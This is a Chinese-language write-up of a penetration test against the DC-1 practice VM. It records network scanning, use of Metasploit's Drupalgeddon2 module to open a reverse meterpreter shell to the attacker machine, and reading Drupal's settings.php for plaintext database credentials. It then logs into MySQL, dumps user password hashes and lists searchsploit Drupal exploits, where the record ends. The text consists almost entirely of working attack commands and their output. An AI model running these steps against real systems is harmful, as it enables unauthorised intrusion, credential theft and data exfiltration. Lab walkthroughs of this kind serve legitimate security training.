DC-1靶机渗透测试记录

攻击机 kali-linux-2020.4-vbox-i386 设置 USB设备关闭，网络连接方式仅主机（Host-Only）网络。
攻击机IP 192.168.56.103

步骤1 靶机目标发现
因为靶机和攻击机在同一个网络内，所以使用KALI上arp-scan -l 进行扫描。扫描确定了靶机的IP是192.168.56.102。

┌──(root??kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:83:cd:26, IPv4: 192.168.56.103
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:14       (Unknown: locally administered)
192.168.56.100  08:00:27:03:d6:2e       PCS Systemtechnik GmbH
192.168.56.100  08:00:27:ec:2e:b6       PCS Systemtechnik GmbH (DUP: 2)
192.168.56.102  08:00:27:ab:b3:05       PCS Systemtechnik GmbH
192.168.56.115  08:00:27:2b:13:12       PCS Systemtechnik GmbH6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.106 seconds (121.56 hosts/sec). 5 responded

找到靶机的IP为192.168.56.102后，对该主机进行端口扫描，查看开了哪些端口以及端口其他信息。

┌──(root??kali)-[~]
└─# nmap -sS -p- -A 192.168.56.102
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-17 22:15 EST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.102
Host is up (0.00068s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36135/udp   status
|   100024  1          36754/tcp   status
|   100024  1          42863/tcp6  status
|_  100024  1          52263/udp6  status
36754/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:AB:B3:05 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT     ADDRESS
1   0.68 ms 192.168.56.102OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.45 seconds

步骤2 漏洞利用
注意到80端口是开放的，所以关注到http://192.168.56.102网页。

注意到页面上有"Drupal Site"的字样，便尝试用metasploit查找一下有没有可以利用的已知漏洞。经过反复尝试，找到drupal_drupalgeddon2 可以利用成功。

┌──(root??kali)-[~]
└─# msfconsole,           ,/             \((__---,,,---__))(_) O O (_)_________\ _ /            |\o_o \   M S F   | \\   _____  |  *|||   WW||||||     |||=[ metasploit v6.0.15-dev                          ]
+ -- --=[ 2071 exploits - 1123 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]Metasploit tip: You can use help to view all available commandsmsf6 > search DrupalMatching Modules
================#  Name                                           Disclosure Date  Rank       Check  Description-  ----                                           ---------------  ----       -----  -----------0  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection1  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection3  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution4  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection5  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution6  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code ExecutionInteract with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_evalmsf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show optionsModule options (exploit/unix/webapp/drupal_drupalgeddon2):Name         Current Setting  Required  Description----         ---------------  --------  -----------DUMP_OUTPUT  false            no        Dump payload command outputPHP_FUNC     passthru         yes       PHP function to executeProxies                       no        A proxy chain of format type:host:port[,type:host:port][...]RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'RPORT        80               yes       The target port (TCP)SSL          false            no        Negotiate SSL/TLS for outgoing connectionsTARGETURI    /                yes       Path to Drupal installVHOST                         no        HTTP server virtual hostPayload options (php/meterpreter/reverse_tcp):Name   Current Setting  Required  Description----   ---------------  --------  -----------LHOST  127.0.0.1        yes       The listen address (an interface may be specified)LPORT  4444             yes       The listen portExploit target:Id  Name--  ----0   Automatic (PHP In-Memory)msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 192.168.56.103
LHOST => 192.168.56.103
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit[*] Started reverse TCP handler on 192.168.56.103:4444
[*] Sending stage (39282 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.103:4444 -> 192.168.56.102:40395) at 2020-12-17 22:36:21 -0500meterpreter >

步骤3 找到flag1
看样子应该漏洞利用成功了，我们看看现在是什么目录，我们能不能访问靶机目录下的文件。找到了flag1.txt，里面的意思是提醒我要关注配置文件。

meterpreter > pwd
/var/www
meterpreter > ls
Listing: /var/www
=================Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  174    fil   2013-11-20 15:45:59 -0500  .gitignore
100644/rw-r--r--  5767   fil   2013-11-20 15:45:59 -0500  .htaccess
100644/rw-r--r--  1481   fil   2013-11-20 15:45:59 -0500  COPYRIGHT.txt
100644/rw-r--r--  1451   fil   2013-11-20 15:45:59 -0500  INSTALL.mysql.txt
100644/rw-r--r--  1874   fil   2013-11-20 15:45:59 -0500  INSTALL.pgsql.txt
100644/rw-r--r--  1298   fil   2013-11-20 15:45:59 -0500  INSTALL.sqlite.txt
100644/rw-r--r--  17861  fil   2013-11-20 15:45:59 -0500  INSTALL.txt
100755/rwxr-xr-x  18092  fil   2013-11-01 06:14:15 -0400  LICENSE.txt
100644/rw-r--r--  8191   fil   2013-11-20 15:45:59 -0500  MAINTAINERS.txt
100644/rw-r--r--  5376   fil   2013-11-20 15:45:59 -0500  README.txt
100644/rw-r--r--  9642   fil   2013-11-20 15:45:59 -0500  UPGRADE.txt
100644/rw-r--r--  6604   fil   2013-11-20 15:45:59 -0500  authorize.php
100644/rw-r--r--  720    fil   2013-11-20 15:45:59 -0500  cron.php
100644/rw-r--r--  52     fil   2019-02-19 08:20:46 -0500  flag1.txt
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  includes
100644/rw-r--r--  529    fil   2013-11-20 15:45:59 -0500  index.php
100644/rw-r--r--  703    fil   2013-11-20 15:45:59 -0500  install.php
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  misc
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  modules
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  profiles
100644/rw-r--r--  1561   fil   2013-11-20 15:45:59 -0500  robots.txt
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  scripts
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  sites
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  themes
100644/rw-r--r--  19941  fil   2013-11-20 15:45:59 -0500  update.php
100644/rw-r--r--  2178   fil   2013-11-20 15:45:59 -0500  web.config
100644/rw-r--r--  417    fil   2013-11-20 15:45:59 -0500  xmlrpc.phpmeterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.

步骤4 flag2获取
那就按照flag1的提示找找配置文件吧。
找啊找，找到数据库的配置文件看到flag2，同时也发现有明文显示的数据账号密码。

meterpreter > pwd
/var/www/sites/default
meterpreter > cat settings.php
<?php/**** flag2* Brute force and dictionary attacks aren't the* only ways to gain access (and you WILL need access).* What can you do with these credentials?**/$databases = array ('default' =>array ('default' =>array ('database' => 'drupaldb','username' => 'dbuser','password' => 'R0ck3t','host' => 'localhost','port' => '','driver' => 'mysql','prefix' => '',),),
);/*** Access control for update.php script.** If you are updating your Drupal installation using the update.php script but* are not logged in using either an account with the "Administer software* updates" permission or the site maintenance account (the account that was* created during installation), you will need to modify the access check* statement below. Change the FALSE to a TRUE to disable the access check.* After finishing the upgrade, be sure to open this file again and change the* TRUE back to a FALSE!*/
$update_free_access = FALSE;/*** Salt for one-time login links and cancel links, form tokens, etc.** This variable will be set to a random value by the installer. All one-time* login links will be invalidated if the value is changed. Note that if your* site is deployed on a cluster of web servers, you must ensure that this* variable has the same value on each server. If this variable is empty, a hash* of the serialized database credentials will be used as a fallback salt.** For enhanced security, you may set this variable to a value using the* contents of a file outside your docroot that is never saved together* with any backups of your Drupal files and database.** Example:*   $drupal_hash_salt = file_get_contents('/home/example/salt.txt');**/
$drupal_hash_salt = 'X8gdX7OdYRiBnlHoj0ukhtZ7eO4EDrvMkhN21SWZocs';/*** Base URL (optional).** If Drupal is generating incorrect URLs on your site, which could* be in HTML headers (links to CSS and JS files) or visible links on pages* (such as in menus), uncomment the Base URL statement below (remove the* leading hash sign) and fill in the absolute URL to your Drupal installation.** You might also want to force users to use a given domain.* See the .htaccess file for more information.** Examples:*   $base_url = 'http://www.example.com';*   $base_url = 'http://www.example.com:8888';*   $base_url = 'http://www.example.com/drupal';*   $base_url = 'https://www.example.com:8888/drupal';** It is not allowed to have a trailing slash; Drupal will add it* for you.*/
# $base_url = 'http://www.example.com';  // NO trailing slash!/*** PHP settings:** To see what PHP settings are possible, including whether they can be set at* runtime (by using ini_set()), read the PHP documentation:* http://www.php.net/manual/en/ini.list.php* See drupal_environment_initialize() in includes/bootstrap.inc for required* runtime settings and the .htaccess file for non-runtime settings. Settings* defined there should not be duplicated here so as to avoid conflict issues.*//*** Some distributions of Linux (most notably Debian) ship their PHP* installations with garbage collection (gc) disabled. Since Drupal depends on* PHP's garbage collection for clearing sessions, ensure that garbage* collection occurs by using the most common settings.*/
ini_set('session.gc_probability', 1);
ini_set('session.gc_divisor', 100);/*** Set session lifetime (in seconds), i.e. the time from the user's last visit* to the active session may be deleted by the session garbage collector. When* a session is deleted, authenticated users are logged out, and the contents* of the user's $_SESSION variable is discarded.*/
ini_set('session.gc_maxlifetime', 200000);/*** Set session cookie lifetime (in seconds), i.e. the time from the session is* created to the cookie expires, i.e. when the browser is expected to discard* the cookie. The value 0 means "until the browser is closed".*/
ini_set('session.cookie_lifetime', 2000000);/*** If you encounter a situation where users post a large amount of text, and* the result is stripped out upon viewing but can still be edited, Drupal's* output filter may not have sufficient memory to process it.  If you* experience this issue, you may wish to uncomment the following two lines* and increase the limits of these variables.  For more information, see* http://php.net/manual/en/pcre.configuration.php.*/
# ini_set('pcre.backtrack_limit', 200000);
# ini_set('pcre.recursion_limit', 200000);/*** Drupal automatically generates a unique session cookie name for each site* based on its full domain name. If you have multiple domains pointing at the* same Drupal site, you can either redirect them all to a single domain (see* comment in .htaccess), or uncomment the line below and specify their shared* base domain. Doing so assures that users remain logged in as they cross* between your various domains. Make sure to always start the $cookie_domain* with a leading dot, as per RFC 2109.*/
# $cookie_domain = '.example.com';/*** Variable overrides:** To override specific entries in the 'variable' table for this site,* set them here. You usually don't need to use this feature. This is* useful in a configuration file for a vhost or directory, rather than* the default settings.php. Any configuration setting from the 'variable'* table can be given a new value. Note that any values you provide in* these variable overrides will not be modifiable from the Drupal* administration interface.** The following overrides are examples:* - site_name: Defines the site's name.* - theme_default: Defines the default theme for this site.* - anonymous: Defines the human-readable name of anonymous users.* Remove the leading hash signs to enable.*/
# $conf['site_name'] = 'My Drupal site';
# $conf['theme_default'] = 'garland';
# $conf['anonymous'] = 'Visitor';/*** A custom theme can be set for the offline page. This applies when the site* is explicitly set to maintenance mode through the administration page or when* the database is inactive due to an error. It can be set through the* 'maintenance_theme' key. The template file should also be copied into the* theme. It is located inside 'modules/system/maintenance-page.tpl.php'.* Note: This setting does not apply to installation and update pages.*/
# $conf['maintenance_theme'] = 'bartik';/*** Reverse Proxy Configuration:** Reverse proxy servers are often used to enhance the performance* of heavily visited sites and may also provide other site caching,* security, or encryption benefits. In an environment where Drupal* is behind a reverse proxy, the real IP address of the client should* be determined such that the correct client IP address is available* to Drupal's logging, statistics, and access management systems. In* the most simple scenario, the proxy server will add an* X-Forwarded-For header to the request that contains the client IP* address. However, HTTP headers are vulnerable to spoofing, where a* malicious client could bypass restrictions by setting the* X-Forwarded-For header directly. Therefore, Drupal's proxy* configuration requires the IP addresses of all remote proxies to be* specified in $conf['reverse_proxy_addresses'] to work correctly.** Enable this setting to get Drupal to determine the client IP from* the X-Forwarded-For header (or $conf['reverse_proxy_header'] if set).* If you are unsure about this setting, do not have a reverse proxy,* or Drupal operates in a shared hosting environment, this setting* should remain commented out.** In order for this setting to be used you must specify every possible* reverse proxy IP address in $conf['reverse_proxy_addresses'].* If a complete list of reverse proxies is not available in your* environment (for example, if you use a CDN) you may set the* $_SERVER['REMOTE_ADDR'] variable directly in settings.php.* Be aware, however, that it is likely that this would allow IP* address spoofing unless more advanced precautions are taken.*/
# $conf['reverse_proxy'] = TRUE;/*** Specify every reverse proxy IP address in your environment.* This setting is required if $conf['reverse_proxy'] is TRUE.*/
# $conf['reverse_proxy_addresses'] = array('a.b.c.d', ...);/*** Set this value if your proxy server sends the client IP in a header* other than X-Forwarded-For.*/
# $conf['reverse_proxy_header'] = 'HTTP_X_CLUSTER_CLIENT_IP';/*** Page caching:** By default, Drupal sends a "Vary: Cookie" HTTP header for anonymous page* views. This tells a HTTP proxy that it may return a page from its local* cache without contacting the web server, if the user sends the same Cookie* header as the user who originally requested the cached page. Without "Vary:* Cookie", authenticated users would also be served the anonymous page from* the cache. If the site has mostly anonymous users except a few known* editors/administrators, the Vary header can be omitted. This allows for* better caching in HTTP proxies (including reverse proxies), i.e. even if* clients send different cookies, they still get content served from the cache.* However, authenticated users should access the site directly (i.e. not use an* HTTP proxy, and bypass the reverse proxy if one is used) in order to avoid* getting cached pages from the proxy.*/
# $conf['omit_vary_cookie'] = TRUE;/*** CSS/JS aggregated file gzip compression:** By default, when CSS or JS aggregation and clean URLs are enabled Drupal will* store a gzip compressed (.gz) copy of the aggregated files. If this file is* available then rewrite rules in the default .htaccess file will serve these* files to browsers that accept gzip encoded content. This allows pages to load* faster for these users and has minimal impact on server load. If you are* using a webserver other than Apache httpd, or a caching reverse proxy that is* configured to cache and compress these files itself you may want to uncomment* one or both of the below lines, which will prevent gzip files being stored.*/
# $conf['css_gzip_compression'] = FALSE;
# $conf['js_gzip_compression'] = FALSE;/*** String overrides:** To override specific strings on your site with or without enabling the Locale* module, add an entry to this list. This functionality allows you to change* a small number of your site's default English language interface strings.** Remove the leading hash signs to enable.*/
# $conf['locale_custom_strings_en'][''] = array(
#   'forum'      => 'Discussion board',
#   '@count min' => '@count minutes',
# );/**** IP blocking:** To bypass database queries for denied IP addresses, use this setting.* Drupal queries the {blocked_ips} table by default on every page request* for both authenticated and anonymous users. This allows the system to* block IP addresses from within the administrative interface and before any* modules are loaded. However on high traffic websites you may want to avoid* this query, allowing you to bypass database access altogether for anonymous* users under certain caching configurations.** If using this setting, you will need to add back any IP addresses which* you may have blocked via the administrative interface. Each element of this* array represents a blocked IP address. Uncommenting the array and leaving it* empty will have the effect of disabling IP blocking on your site.** Remove the leading hash signs to enable.*/
# $conf['blocked_ips'] = array(
#   'a.b.c.d',
# );/*** Fast 404 pages:** Drupal can generate fully themed 404 pages. However, some of these responses* are for images or other resource files that are not displayed to the user.* This can waste bandwidth, and also generate server load.** The options below return a simple, fast 404 page for URLs matching a* specific pattern:* - 404_fast_paths_exclude: A regular expression to match paths to exclude,*   such as images generated by image styles, or dynamically-resized images.*   If you need to add more paths, you can add '|path' to the expression.* - 404_fast_paths: A regular expression to match paths that should return a*   simple 404 page, rather than the fully themed 404 page. If you don't have*   any aliases ending in htm or html you can add '|s?html?' to the expression.* - 404_fast_html: The html to return for simple 404 pages.** Add leading hash signs if you would like to disable this functionality.*/
$conf['404_fast_paths_exclude'] = '/\/(?:styles)\//';
$conf['404_fast_paths'] = '/\.(?:txt|png|gif|jpe?g|css|js|ico|swf|flv|cgi|bat|pl|dll|exe|asp)$/i';
$conf['404_fast_html'] = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "@path" was not found on this server.</p></body></html>';/*** By default the page request process will return a fast 404 page for missing* files if they match the regular expression set in '404_fast_paths' and not* '404_fast_paths_exclude' above. 404 errors will simultaneously be logged in* the Drupal system log.** You can choose to return a fast 404 page earlier for missing pages (as soon* as settings.php is loaded) by uncommenting the line below. This speeds up* server response time when loading 404 error pages and prevents the 404 error* from being logged in the Drupal system log. In order to prevent valid pages* such as image styles and other generated content that may match the* '404_fast_html' regular expression from returning 404 errors, it is necessary* to add them to the '404_fast_paths_exclude' regular expression above. Make* sure that you understand the effects of this feature before uncommenting the* line below.*/
# drupal_fast_404();/*** External access proxy settings:** If your site must access the Internet via a web proxy then you can enter* the proxy settings here. Currently only basic authentication is supported* by using the username and password variables. The proxy_user_agent variable* can be set to NULL for proxies that require no User-Agent header or to a* non-empty string for proxies that limit requests to a specific agent. The* proxy_exceptions variable is an array of host names to be accessed directly,* not via proxy.*/
# $conf['proxy_server'] = '';
# $conf['proxy_port'] = 8080;
# $conf['proxy_username'] = '';
# $conf['proxy_password'] = '';
# $conf['proxy_user_agent'] = '';
# $conf['proxy_exceptions'] = array('127.0.0.1', 'localhost');/*** Authorized file system operations:** The Update manager module included with Drupal provides a mechanism for* site administrators to securely install missing updates for the site* directly through the web user interface. On securely-configured servers,* the Update manager will require the administrator to provide SSH or FTP* credentials before allowing the installation to proceed; this allows the* site to update the new files as the user who owns all the Drupal files,* instead of as the user the webserver is running as. On servers where the* webserver user is itself the owner of the Drupal files, the administrator* will not be prompted for SSH or FTP credentials (note that these server* setups are common on shared hosting, but are inherently insecure).** Some sites might wish to disable the above functionality, and only update* the code directly via SSH or FTP themselves. This setting completely* disables all functionality related to these authorized file operations.** @see http://drupal.org/node/244924** Remove the leading hash signs to disable.*/
# $conf['allow_authorize_operations'] = FALSE;

步骤5 数据库内搜索
尝试用用获得的账号和密码登陆靶机数据库。注意到该靶机是支持python2.7的。因为执行了“python -c "import pty;pty.spawn('/bin/bash')”便于交互输入。

meterpreter > shell
Process 4998 created.
Channel 3 created.
python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-1:/var/www/sites/default$ mysql -u dbuser -pR0ck3t
mysql -u dbuser -pR0ck3t
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8555
Server version: 5.5.60-0+deb7u1 (Debian)Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.mysql>

成功进入数据库了，下面在数据库里搜索信息

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupaldb           |
+--------------------+
2 rows in set (0.00 sec)
mysql> use drupaldb
use drupaldb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changedmysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_update                |
| cache_views                 |
| cache_views_data            |
| comment                     |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_comment_body     |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_comment_body |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter                      |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_comment_statistics     |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| system                      |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
+-----------------------------+
80 rows in set (0.00 sec)

查看所有的表，对名为users表比较感兴趣。查看表内数据希望能发现可用于登陆的账号密码。

mysql> select * from users;
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
|   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
|   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0; |
|   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)

发现用户的密码用不知名方法加密了，这咋办？是不是有办法可以增加一个用户呢？msf是个好工具，我们要充分利用它。果然找到了可以增加用户的漏洞利用方法。

┌──(root??kali)-[~]
└─# msfconsole                                                                                                                     127 ?%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %  %%%%%%%%   %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%=[ metasploit v6.0.15-dev                          ]
+ -- --=[ 2071 exploits - 1123 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]Metasploit tip: You can use help to view all available commandsmsf6 > searchsploit drupal
[*] exec: searchsploit drupal------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title                                                                                         |  Path
------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal 4.0 - News Message HTML Injection                                                               | php/webapps/21863.txt
Drupal 4.1/4.2 - Cross-Site Scripting                                                                  | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection                                                          | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                            | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection                                                          | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash ation Vector                                                                | php/webapps/4510.txt
Drupal 5.21/6.16 - Denial of Service                                                                   | php/dos/10826.sh
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities                                 | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                      | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                                       | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                            | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                            | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                               | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                                                 | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                                                     | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution                                                | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution                                                  | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities                                                          | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                                                                      | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                               | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                            | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                    | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                       | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)  | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                         | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                                     | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                                      | php/webapps/44501.txt
Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections                                         | php/webapps/32415.txt
Drupal Module CAPTCHA - Security Bypass                                                                | php/webapps/35335.html
